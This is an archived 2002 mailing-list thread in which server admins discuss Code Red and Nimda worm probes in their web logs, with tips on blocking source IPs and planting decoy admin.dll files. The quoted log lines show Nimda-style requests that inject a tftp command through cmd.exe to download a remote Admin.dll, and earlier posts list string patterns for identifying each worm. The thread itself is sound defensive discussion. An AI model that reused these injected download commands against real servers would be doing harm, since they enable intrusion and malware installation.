Even though my server is patched, when I see the tftp requests, I use the IS Manager and dis-allow that IP address for server access. Then I never see that particular IP/Server in the logs after that. I also took a text file, renamed it to admin.dll, made it +RSH flags, and stuck it in the root of all the drives in the server. This after seeing log entries like below;
208: : 6/May/02 09:10: /winnt/system32/cmd.exe?/c+tftp -i 'IP.#.#.#' GET Admin.dll c:\Admin.dll 206: : 6/May/02 09:10: /winnt/system32/cmd.exe?/c+tftp -i 'IP.#.#.#' GET Admin.dll d:\Admin.dll 204: : 6/May/02 09:10: /winnt/system32/cmd.exe?/c+tftp -i 'IP.#.#.#.' GET Admin.dll e:\Admin.dll Peter Hickman wrote: > Pierre Abbat wrote: > >> If it has: >> NNNNNNNNNNNN it's Code Red 1. >> XXXXXXXXXXXXX it's Code Red 2. >> /winnt/ it's Nimda. >> AAAAAAAAAAAAA it's some new worm that showed up in my web log a few >> days ago. Where do I report this? I tried bugtraq and the moderator >> ignored it. >> > > I just wait until it happens enough for someone else (who people will > listen to) to notice. > > If it's part of the /default.ida exploit then you should be safe, it's > just some kiddiot playing. Providing of course that you have the > appropriate patch in place. > > I think I used to email to McAfee and Symantec and then forget all > about it. Now I just forget it - we run Linux. > > Maybe you could try www.messagelabs.com, the truth of it is all these > places are keyed in on multiple reports from different individuals, if > you are the only person to have seen it then it really isn't a threat. > > Wish these admins would patch their servers. > > > +------------------------------------------------------------------------ > | This is the analog-help mailing list. To unsubscribe from this > | mailing list, go to > | http://lists.isite.net/listgate/analog-help/unsubscribe.html > | > | List archives are available at > | http://www.mail-archive.com/[email protected]/ > | http://lists.isite.net/listgate/analog-help/archives/ > | http://www.tallylist.com/archives/index.cfm/mlist.7 > +------------------------------------------------------------------------ > -- Robert Locke __.@ | ens inc. _`\ \> | 201.291.0990 (x)/ (x) | ext.26 +------------------------------------------------------------------------ | This is the analog-help mailing list. To unsubscribe from this | mailing list, go to | http://lists.isite.net/listgate/analog-help/unsubscribe.html | | List archives are available at | http://www.mail-archive.com/[email protected]/ | http://lists.isite.net/listgate/analog-help/archives/ | http://www.tallylist.com/archives/index.cfm/mlist.7 +------------------------------------------------------------------------
